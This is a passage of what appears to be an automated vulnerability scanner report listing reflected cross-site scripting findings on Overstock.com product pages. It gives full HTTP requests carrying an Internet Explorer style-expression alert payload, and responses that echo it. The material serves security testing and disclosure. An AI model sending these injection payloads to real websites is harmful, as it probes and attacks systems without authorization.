Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=77
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108166

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Be
...[SNIP]...
<input type="hidden" name="28664"style="x:expression(alert(1))"2a92a237479" value="1"/>
...[SNIP]...

2.155. http://www.overstock.com/Home-Garden/Bella-Sea-Foam-Brooks-Sofa/4754971/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Bella-Sea-Foam-Brooks-Sofa/4754971/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f699e"style%3d"x%3aexpression(alert(1))"06c80db439f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f699e"style="x:expression(alert(1))"06c80db439f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Bella-Sea-Foam-Brooks-Sofa/4754971/product.html?f699e"style%3d"x%3aexpression(alert(1))"06c80db439f=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:20:48 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:20:48 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:20:48 GMT; Path=/
Set-Cookie: mxcproclicks=4754971|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:20:48 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406048184:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=28
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 107116

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Be
...[SNIP]...
<input type="hidden" name="f699e"style="x:expression(alert(1))"06c80db439f" value="1"/>
...[SNIP]...

2.156. http://www.overstock.com/Home-Garden/Black-Wood-Corner-Computer-Desk/2648511/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Black-Wood-Corner-Computer-Desk/2648511/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 185b5"style%3d"x%3aexpression(alert(1))"71644a27043 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 185b5"style="x:expression(alert(1))"71644a27043 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Black-Wood-Corner-Computer-Desk/2648511/product.html?185b5"style%3d"x%3aexpression(alert(1))"71644a27043=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:26:52 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:26:52 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=2648511|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:26:52 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406412538:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:26:52 GMT; Path=/
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 107285

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>Bl
...[SNIP]...
<input type="hidden" name="185b5"style="x:expression(alert(1))"71644a27043" value="1"/>
...[SNIP]...

2.157. http://www.overstock.com/Home-Garden/Black-and-White-Wing-Recliner/4692750/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Black-and-White-Wing-Recliner/4692750/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ebb4"style%3d"x%3aexpression(alert(1))"ef714e226b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6ebb4"style="x:expression(alert(1))"ef714e226b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Black-and-White-Wing-Recliner/4692750/product.html?6ebb4"style%3d"x%3aexpression(alert(1))"ef714e226b7=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:50:11 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:50:11 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404211714:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4692750|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:50:11 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:50:11 GMT; Path=/
Keep-Alive: timeout=5, max=47
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 106943

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Bl
...[SNIP]...
<input type="hidden" name="6ebb4"style="x:expression(alert(1))"ef714e226b7" value="1"/>
...[SNIP]...

2.158. http://www.overstock.com/Home-Garden/Blooming-Prairie-3-Piece-Quilt-Set/3707290/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Blooming-Prairie-3-Piece-Quilt-Set/3707290/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe84a"style%3d"x%3aexpression(alert(1))"ca3383fac81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe84a"style="x:expression(alert(1))"ca3383fac81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Blooming-Prairie-3-Piece-Quilt-Set/3707290/product.html?fe84a"style%3d"x%3aexpression(alert(1))"ca3383fac81=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:48:57 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:48:57 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=3707290|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:48:57 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407737223:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:48:57 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=41
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 116127

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Bl
...[SNIP]...
<input type="hidden" name="fe84a"style="x:expression(alert(1))"ca3383fac81" value="1"/>
...[SNIP]...

2.159. http://www.overstock.com/Home-Garden/Bodipedic-10-inch-Queen-size-Memory-Foam-Mattress-and-Cover-Set/1150841/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Bodipedic-10-inch-Queen-size-Memory-Foam-Mattress-and-Cover-Set/1150841/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cba57"style%3d"x%3aexpression(alert(1))"8420a7840b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cba57"style="x:expression(alert(1))"8420a7840b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Bodipedic-10-inch-Queen-size-Memory-Foam-Mattress-and-Cover-Set/1150841/product.html?cba57"style%3d"x%3aexpression(alert(1))"8420a7840b1=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:23:24 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:23:24 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=1150841|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:23:24 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406204584:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:23:24 GMT; Path=/
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 124276

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>Bo
...[SNIP]...
<input type="hidden" name="cba57"style="x:expression(alert(1))"8420a7840b1" value="1"/>
...[SNIP]...

2.160. http://www.overstock.com/Home-Garden/Bodipedic-3-inch-Memory-Foam-Topper-and-Cover-Set/4107143/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Bodipedic-3-inch-Memory-Foam-Topper-and-Cover-Set/4107143/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6beca"style%3d"x%3aexpression(alert(1))"46bb046a4c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6beca"style="x:expression(alert(1))"46bb046a4c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Bodipedic-3-inch-Memory-Foam-Topper-and-Cover-Set/4107143/product.html?6beca"style%3d"x%3aexpression(alert(1))"46bb046a4c0=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:43:20 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:43:20 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=4107143|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:43:20 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407400835:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:43:20 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=12
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 118909

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Bo
...[SNIP]...
<input type="hidden" name="6beca"style="x:expression(alert(1))"46bb046a4c0" value="1"/>
...[SNIP]...

2.161. http://www.overstock.com/Home-Garden/Buffalo-Tools-Electric-Chain-Saw-Sharpener/4188189/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Buffalo-Tools-Electric-Chain-Saw-Sharpener/4188189/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6080"style%3d"x%3aexpression(alert(1))"7a02a62f1b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d6080"style="x:expression(alert(1))"7a02a62f1b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Buffalo-Tools-Electric-Chain-Saw-Sharpener/4188189/product.html?d6080"style%3d"x%3aexpression(alert(1))"7a02a62f1b8=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:38:52 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:38:53 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:38:53 GMT; Path=/
Set-Cookie: mxcproclicks=4188189|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:38:53 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407132957:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=34
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 105712

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Bu
...[SNIP]...
<input type="hidden" name="d6080"style="x:expression(alert(1))"7a02a62f1b8" value="1"/>
...[SNIP]...

2.162. http://www.overstock.com/Home-Garden/Cabo-Mocha-Microsuede-Sectional-Sofa-Set/4737201/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Cabo-Mocha-Microsuede-Sectional-Sofa-Set/4737201/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c512"style%3d"x%3aexpression(alert(1))"b229728369b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2c512"style="x:expression(alert(1))"b229728369b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Cabo-Mocha-Microsuede-Sectional-Sofa-Set/4737201/product.html?2c512"style%3d"x%3aexpression(alert(1))"b229728369b=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
